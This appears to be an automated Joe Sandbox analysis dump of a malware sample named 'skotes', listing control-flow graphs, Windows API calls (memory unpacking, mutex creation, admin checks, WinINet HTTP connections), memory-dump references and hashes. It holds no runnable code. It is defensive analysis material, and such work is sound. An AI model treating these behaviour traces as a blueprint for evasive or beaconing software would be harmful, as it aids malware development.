                    control_flow_graph 1969 62003c-620047 1970 620049 1969->1970 1971 62004c-620263 call 620a3f call 620e0f call 620d90 VirtualAlloc 1969->1971 1970->1971 1986 620265-620289 call 620a69 1971->1986 1987 62028b-620292 1971->1987 1992 6202ce-6203c2 VirtualProtect call 620cce call 620ce7 1986->1992 1989 6202a1-6202b0 1987->1989 1991 6202b2-6202cc 1989->1991 1989->1992 1991->1989 1998 6203d1-6203e0 1992->1998 1999 6203e2-620437 call 620ce7 1998->1999 2000 620439-6204b8 VirtualFree 1998->2000 1999->1998 2001 6205f4-6205fe 2000->2001 2002 6204be-6204cd 2000->2002 2005 620604-62060d 2001->2005 2006 62077f-620789 2001->2006 2004 6204d3-6204dd 2002->2004 2004->2001 2011 6204e3-620505 LoadLibraryA 2004->2011 2005->2006 2012 620613-620637 2005->2012 2009 6207a6-6207b0 2006->2009 2010 62078b-6207a3 2006->2010 2013 6207b6-6207cb 2009->2013 2014 62086e-6208be LoadLibraryA 2009->2014 2010->2009 2015 620517-620520 2011->2015 2016 620507-620515 2011->2016 2017 62063e-620648 2012->2017 2018 6207d2-6207d5 2013->2018 2021 6208c7-6208f9 2014->2021 2019 620526-620547 2015->2019 2016->2019 2017->2006 2020 62064e-62065a 2017->2020 2022 6207d7-6207e0 2018->2022 2023 620824-620833 2018->2023 2024 62054d-620550 2019->2024 2020->2006 2025 620660-62066a 2020->2025 2026 620902-62091d 2021->2026 2027 6208fb-620901 2021->2027 2028 6207e2 2022->2028 2029 6207e4-620822 2022->2029 2033 620839-62083c 2023->2033 2030 6205e0-6205ef 2024->2030 2031 620556-62056b 2024->2031 2032 62067a-620689 2025->2032 2027->2026 2028->2023 2029->2018 2030->2004 2034 62056f-62057a 2031->2034 2035 62056d 2031->2035 2036 620750-62077a 2032->2036 2037 62068f-6206b2 2032->2037 2033->2014 2038 62083e-620847 2033->2038 2040 62059b-6205bb 2034->2040 2041 62057c-620599 2034->2041 2035->2030 2036->2017 2042 6206b4-6206ed 2037->2042 2043 6206ef-6206fc 2037->2043 2044 62084b-62086c 2038->2044 2045 620849 2038->2045 2052 6205bd-6205db 2040->2052 2041->2052 2042->2043 2046 62074b 2043->2046 2047 6206fe-620748 2043->2047 2044->2033 2045->2014 2046->2032 2047->2046 2052->2024
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0062024D
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668844085.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_620000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: 42ec4702e70d4e90e99a8a4f860a1c510c2e99c0fd791167ea9c40f41969c617
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: FB526874A01229DFDB64CF58D985BA8BBB1BF09304F1480D9E94DAB352DB30AE85DF14

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2056 4426f2-44271a call 442133 call 442191 2061 442720-44272c call 442139 2056->2061 2062 442842-44289e call 436c87 call 4462ee 2056->2062 2061->2062 2068 442732-44273e call 442165 2061->2068 2074 4428a0-4428a6 2062->2074 2075 4428a8-4428ab 2062->2075 2068->2062 2073 442744-442765 call 43adf5 GetTimeZoneInformation 2068->2073 2083 442820-442841 call 44212d call 442121 call 442127 2073->2083 2084 44276b-44278c 2073->2084 2078 4428ee-442900 2074->2078 2077 4428ad-4428bd call 43b04b 2075->2077 2075->2078 2091 4428c7-4428e0 call 4462ee 2077->2091 2092 4428bf 2077->2092 2081 442910 2078->2081 2082 442902-442905 2078->2082 2086 442915-44292a call 43adf5 call 41cff1 2081->2086 2087 442910 call 4426f2 2081->2087 2082->2081 2088 442907-44290e call 442517 2082->2088 2089 442796-44279d 2084->2089 2090 44278e-442793 2084->2090 2087->2086 2088->2086 2096 4427af-4427b1 2089->2096 2097 44279f-4427a6 2089->2097 2090->2089 2112 4428e5-4428eb call 43adf5 2091->2112 2113 4428e2-4428e3 2091->2113 2098 4428c0-4428c5 call 43adf5 2092->2098 2105 4427b3-4427dc call 43ef17 call 43e926 2096->2105 2097->2096 2103 4427a8-4427ad 2097->2103 2115 4428ed 2098->2115 2103->2105 2123 4427de-4427e1 2105->2123 2124 4427ea-4427ec 2105->2124 2112->2115 2113->2098 2115->2078 2123->2124 2126 4427e3-4427e8 2123->2126 2125 4427ee-44280c call 43e926 2124->2125 2129 44280e-442811 2125->2129 2130 44281b-44281e 2125->2130 2126->2125 2129->2130 2131 442813-442819 2129->2131 2130->2083 2131->2083
                    APIs
                    • GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00456758), ref: 0044275C
                    • _free.LIBCMT ref: 0044274A
                      • Part of subcall function 0043ADF5: HeapFree.KERNEL32(00000000,00000000,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?), ref: 0043AE0B
                      • Part of subcall function 0043ADF5: GetLastError.KERNEL32(?,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?,?), ref: 0043AE1D
                    • _free.LIBCMT ref: 00442916
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                    • String ID: Eastern Standard Time$Eastern Summer Time$XgE
                    • API String ID: 2155170405-3532857169
                    • Opcode ID: 408f858600a1f53604d9e13eb6c4a6de5f766e6ad14c8f26f7ae90bdf88e241d
                    • Instruction ID: 8084bd392b0667b16f992d69d3ac30f533f8d402883a3cc5e9c46bc507ca970f
                    • Opcode Fuzzy Hash: 408f858600a1f53604d9e13eb6c4a6de5f766e6ad14c8f26f7ae90bdf88e241d
                    • Instruction Fuzzy Hash: 3B5117B1900215ABFB10EF65CE819AEB7B8EF44314F51026BF510E3291EBF89E418B59

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2132 436fb4-436fe9 GetFileType 2133 4370a1-4370a4 2132->2133 2134 436fef-436ffa 2132->2134 2137 4370a6-4370a9 2133->2137 2138 4370cd-4370f5 2133->2138 2135 43701c-437038 call 4340f0 GetFileInformationByHandle 2134->2135 2136 436ffc-43700d call 43732a 2134->2136 2149 4370be-4370cb GetLastError call 4375c0 2135->2149 2154 43703e-437080 call 43727c call 437124 * 3 2135->2154 2152 437013-43701a 2136->2152 2153 4370ba-4370bc 2136->2153 2137->2138 2143 4370ab-4370ad 2137->2143 2139 437112-437114 2138->2139 2140 4370f7-43710a PeekNamedPipe 2138->2140 2145 437115-437123 call 41cff1 2139->2145 2140->2139 2144 43710c-43710f 2140->2144 2148 4370af-4370b4 call 4375f6 2143->2148 2143->2149 2144->2139 2148->2153 2149->2153 2152->2135 2153->2145 2166 437085-43709d call 437249 2154->2166 2166->2139 2169 43709f 2166->2169 2169->2153
                    APIs
                    • GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00436EE6), ref: 00436FD6
                    • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00437030
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00436EE6,?,000000FF,00000000,00000000), ref: 004370BE
                    • __dosmaperr.LIBCMT ref: 004370C5
                    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00437102
                      • Part of subcall function 0043732A: __dosmaperr.LIBCMT ref: 0043735F
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                    • String ID: nC
                    • API String ID: 1206951868-4036674207
                    • Opcode ID: 86e5fd9136cdb96635c5e3928c31e0abe061b40da60be764ea64b9a7682f7f14
                    • Instruction ID: 47e44e870bed0e4f5047e2c803f8af1af40435cbdbdaacedd5eb414e92fa1372
                    • Opcode Fuzzy Hash: 86e5fd9136cdb96635c5e3928c31e0abe061b40da60be764ea64b9a7682f7f14
                    • Instruction Fuzzy Hash: 25415EB6904604ABCF389FB6DC459ABBBF9EF48300F10542EF996D3211E638D940CB25
                    APIs
                    • Sleep.KERNELBASE(00000064,?), ref: 0040A963
                    • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                    • GetLastError.KERNEL32 ref: 0040A989
                    • GetLastError.KERNEL32 ref: 0040A99A
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$CreateMutexSleep
                    • String ID: T2F
                    • API String ID: 3645482037-3862687658
                    • Opcode ID: 22d48eb3b4a7bfffc1da350843d0ee0628f12e32837666ee09138f6f29d68e28
                    • Instruction ID: 4267c3f1042b1db60c627e826e67de47f966f9a2e69db95d5a02111995aa7e65
                    • Opcode Fuzzy Hash: 22d48eb3b4a7bfffc1da350843d0ee0628f12e32837666ee09138f6f29d68e28
                    • Instruction Fuzzy Hash: BEE01A34244300DBE7501BA8BC1EB1A762197E4B13F610836E609D62E1D77C8994865F
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,?,708790F9), ref: 004083F9
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408460
                    • GetProcAddress.KERNEL32(00000000), ref: 00408467
                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408524
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                    • String ID:
                    • API String ID: 2167034304-0
                    • Opcode ID: 5d60867e683eb6688146dae2e36a8fce10db26679ecea8bbc19ff5c477483b5e
                    • Instruction ID: 938ad35630e66277154cddf74743d86f98c067e6d70a9bb90e20810804f89ef8
                    • Opcode Fuzzy Hash: 5d60867e683eb6688146dae2e36a8fce10db26679ecea8bbc19ff5c477483b5e
                    • Instruction Fuzzy Hash: E9510870D00214ABDB14EF68DE497DEBB74EB46314F5042BEE445A72C1EF389AC48B99
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,708790F9,00000000,00000000), ref: 004095CF
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileModuleName
                    • String ID: T2F$UA==$hT,F
                    • API String ID: 514040917-3981740572
                    • Opcode ID: c3f63f71a82419a1f98ab6c8412299d49411fd0883c71401ab68ecce9ac564b6
                    • Instruction ID: a3ec3fe220169e7ee09b8d3bcdd3bc73549a871bf8e01dd36361794633b7c963
                    • Opcode Fuzzy Hash: c3f63f71a82419a1f98ab6c8412299d49411fd0883c71401ab68ecce9ac564b6
                    • Instruction Fuzzy Hash: AB919371A101188BDB29DF28CD95BDDB775EB86304F1081EEE409A7292DB399EC4CF84
                    APIs
                    • Sleep.KERNELBASE(00000064,708790F9,?,00000000,00449138,000000FF), ref: 004075CC
                    • __Init_thread_footer.LIBCMT ref: 00407659
                      • Part of subcall function 0041D0C7: RtlEnterCriticalSection.NTDLL(00465750), ref: 0041D0D1
                      • Part of subcall function 0041D0C7: RtlLeaveCriticalSection.NTDLL(00465750), ref: 0041D104
                      • Part of subcall function 0041D0C7: RtlWakeAllConditionVariable.NTDLL ref: 0041D17B
                    • CreateThread.KERNELBASE(00000000,00000000,00407430,00468638,00000000,00000000), ref: 004076BE
                    • Sleep.KERNELBASE(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004076C9
                      • Part of subcall function 0041D111: RtlEnterCriticalSection.NTDLL(00465750), ref: 0041D11C
                      • Part of subcall function 0041D111: RtlLeaveCriticalSection.NTDLL(00465750), ref: 0041D159
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeaveSleep$ConditionCreateInit_thread_footerThreadVariableWake
                    • String ID:
                    • API String ID: 4065365256-0
                    • Opcode ID: 414dff22cb025f4ba11d35654b737033c8d2568d940acc8c2f3813a987c63d95
                    • Instruction ID: 683a647b13dcea2e33a605b0b88060115ff1506c65b181c71abe4559a2bd774f
                    • Opcode Fuzzy Hash: 414dff22cb025f4ba11d35654b737033c8d2568d940acc8c2f3813a987c63d95
                    • Instruction Fuzzy Hash: D751C3B0641248ABEB14DF28DD85B8D3BA1EB45718F50462EF805973D1DBBDE480CB9E
                    APIs
                    • _free.LIBCMT ref: 004428C0
                    • _free.LIBCMT ref: 00442916
                      • Part of subcall function 004426F2: _free.LIBCMT ref: 0044274A
                      • Part of subcall function 004426F2: GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00456758), ref: 0044275C
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$InformationTimeZone
                    • String ID:
                    • API String ID: 597776487-0
                    • Opcode ID: f87cbb37d26a9294995cc9def7b394ab45dcd78de0b256dadcc3d82326988738
                    • Instruction ID: aa9ce2989c6c336e31514a96f4e6fb7d692e09f2712c57d8f72fe12a646e0e08
                    • Opcode Fuzzy Hash: f87cbb37d26a9294995cc9def7b394ab45dcd78de0b256dadcc3d82326988738
                    • Instruction Fuzzy Hash: 3721297280012467FB3077268E41AEF7768DB45364F5103ABF894F2191EFF85D8685AE
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040D913
                    • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?), ref: 0040DA2F
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateDirectoryFileModuleName
                    • String ID:
                    • API String ID: 3341437400-0
                    • Opcode ID: 739ebce6beb3917115f90792f628b6d35057d28e5378ae332019e6667baa2f2e
                    • Instruction ID: 356aa6b92bfaa8af969dd63514fc26cfae74af50270e9637002ed8b1091a62dc
                    • Opcode Fuzzy Hash: 739ebce6beb3917115f90792f628b6d35057d28e5378ae332019e6667baa2f2e
                    • Instruction Fuzzy Hash: ECD1F271D002189BEB24EB28CD497DDBB71AF46304F1441EEE448A72C2DB795BC8CB99
                    APIs
                      • Part of subcall function 00417A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00417AF8
                      • Part of subcall function 00417A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00417B01
                      • Part of subcall function 0040BE30: Sleep.KERNELBASE(000005DC,708790F9,?,00000000), ref: 0040BEB8
                      • Part of subcall function 0040BE30: InternetOpenW.WININET(00458DC8,00000000,00000000,00000000,00000000), ref: 0040BEC7
                      • Part of subcall function 0040BE30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0040BEEB
                      • Part of subcall function 0040BE30: HttpOpenRequestA.WININET(?,00000000), ref: 0040BF35
                    • Sleep.KERNEL32(00001388), ref: 0040E84E
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: InternetOpenSleep$Cnd_destroy_in_situConnectHttpMtx_destroy_in_situRequest
                    • String ID: MGE+
                    • API String ID: 2868416192-475891385
                    • Opcode ID: ea24192c4fa5a7b11ad18394e8ec795415ce9b96ef63fa61b004b728f9a0c733
                    • Instruction ID: ecbd5c1f3dfb36fa84aba9144898932e09c04449fa4207ef1a3ad4e147e0d839
                    • Opcode Fuzzy Hash: ea24192c4fa5a7b11ad18394e8ec795415ce9b96ef63fa61b004b728f9a0c733
                    • Instruction Fuzzy Hash: 5AB15A71A101448BEF1CDF39CE8979DBB22AF86304F54856EE448A73D6C73D8AD08B59
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 252c254f2abb702762ee6eaaae6a4f08298d1525430aa046c5752791b50f707c
                    • Instruction ID: 1ad452bb4f6bd1fcc71e4866ccee7b4b6747d643255ce8273aa22d0afbfa644d
                    • Opcode Fuzzy Hash: 252c254f2abb702762ee6eaaae6a4f08298d1525430aa046c5752791b50f707c
                    • Instruction Fuzzy Hash: EE216D72504205BBDB106B69EC42FAF3729DF49338F11531BF9242B2D1D7789E058665
                    APIs
                    • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,0043705B,?,?,00000000,00000000), ref: 00437152
                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,0043705B,?,?,00000000,00000000), ref: 00437166
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$System$FileLocalSpecific
                    • String ID:
                    • API String ID: 1707611234-0
                    • Opcode ID: 8298bbf10895cd01c4960c57ef31bed2cf3fa0d0b6bd1f945562adba26ccaa03
                    • Instruction ID: b0ce29f20c365957359a722d5338d126ac326b5dc431849d34d62fa4a73a48c2
                    • Opcode Fuzzy Hash: 8298bbf10895cd01c4960c57ef31bed2cf3fa0d0b6bd1f945562adba26ccaa03
                    • Instruction Fuzzy Hash: E3110AB290410DABDF10DFA5C985EDF77BCAB0C310F105266E552E2281EA34EA45CBA5
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006D0F1E
                    • Module32First.KERNEL32(00000000,00000224), ref: 006D0F3E
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668968733.00000000006D0000.00000040.00000020.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_6d0000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: 8e59ecfcb67c654c9ff15bce1e9eb2e7a1073871e4ca28e2d953c8d79ba27e69
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 97F0C2329003146BE7303BB49C8CBAB76E9AF48334F20016AEA42912C0DB70EC058662
                    APIs
                      • Part of subcall function 0040A960: Sleep.KERNELBASE(00000064,?), ref: 0040A963
                      • Part of subcall function 0040A960: CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                      • Part of subcall function 0040A960: GetLastError.KERNEL32 ref: 0040A989
                      • Part of subcall function 0040A960: GetLastError.KERNEL32 ref: 0040A99A
                      • Part of subcall function 00414FC0: IsUserAnAdmin.SHELL32 ref: 00415117
                      • Part of subcall function 00405EE0: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0040617D
                    • CreateThread.KERNELBASE(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00416D10
                    • Sleep.KERNELBASE(00007530), ref: 00416D25
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateErrorLastSleep$AdminMutexOpenThreadUser
                    • String ID:
                    • API String ID: 633219957-0
                    • Opcode ID: 6382081bcbf8a9ed3d33521cf0e432a915f352317681496325614467e45a9fec
                    • Instruction ID: 0e677149ad7de975180ec068863c876e2b41020de11884c8df8d41ceb524a5b2
                    • Opcode Fuzzy Hash: 6382081bcbf8a9ed3d33521cf0e432a915f352317681496325614467e45a9fec
                    • Instruction Fuzzy Hash: 1FE08C75784304A6E21033F27C0BF997A109F09F15F26013AB25A3A1D2D9ECB08086EF
                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,00620223,?,?), ref: 00620E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,00620223,?,?), ref: 00620E1E
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668844085.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_620000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: ca7d39d3f00bb23aeb65542139c9111eb9232972a72a4ee517b453a7e7f206fa
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: FCD0123114512877D7002A94DC09BCD7B1CDF05B62F008411FB0DD9581C770994046E5
                    APIs
                    • GetFileAttributesA.KERNELBASE(00000000), ref: 00409BA8
                    • Sleep.KERNELBASE(00000064,?), ref: 0040A963
                    • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                    • GetLastError.KERNEL32 ref: 0040A989
                    • GetLastError.KERNEL32 ref: 0040A99A
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$AttributesCreateFileMutexSleep
                    • String ID:
                    • API String ID: 2742703886-0
                    • Opcode ID: 53471c46ac7b6a171a8b5fc03fdab2b10b915cfe7e3a144d5f8f792389d3c36a
                    • Instruction ID: 7e1d01c556cb082985a4f17b2a51333caa139cfaeafd210115c5a1cc01520285
                    • Opcode Fuzzy Hash: 53471c46ac7b6a171a8b5fc03fdab2b10b915cfe7e3a144d5f8f792389d3c36a
                    • Instruction Fuzzy Hash: 24310A71B042048BEB08DB78DD8979DBB72AB86314F24822EE014A73D7C77D59818759
                    APIs
                    • GetFileAttributesA.KERNELBASE(00000000), ref: 00409CDD
                    • Sleep.KERNELBASE(00000064,?), ref: 0040A963
                    • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                    • GetLastError.KERNEL32 ref: 0040A989
                    • GetLastError.KERNEL32 ref: 0040A99A
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$AttributesCreateFileMutexSleep
                    • String ID:
                    • API String ID: 2742703886-0
                    • Opcode ID: d0e2ee8929173cdbf4c4eed753dca510f5af732aeb5f74f30a01ddad5c3b4f90
                    • Instruction ID: 0e123196e389163a014bf37837ab22d3a6f9e79e24d0f41892ca171da603fc17
                    • Opcode Fuzzy Hash: d0e2ee8929173cdbf4c4eed753dca510f5af732aeb5f74f30a01ddad5c3b4f90
                    • Instruction Fuzzy Hash: 653121B1B002448BEB08DB78CD8879DBB62EF86314F24872EE014B73D6C73D89808719
                    APIs
                    • GetFileAttributesA.KERNELBASE(00000000), ref: 00409F47
                    • Sleep.KERNELBASE(00000064,?), ref: 0040A963
                    • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                    • GetLastError.KERNEL32 ref: 0040A989
                    • GetLastError.KERNEL32 ref: 0040A99A
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$AttributesCreateFileMutexSleep
                    • String ID:
                    • API String ID: 2742703886-0
                    • Opcode ID: 0216fdfb454eb06baf423f39605ed81fdf4b3bfecdd5e7f155feb547e108ed6f
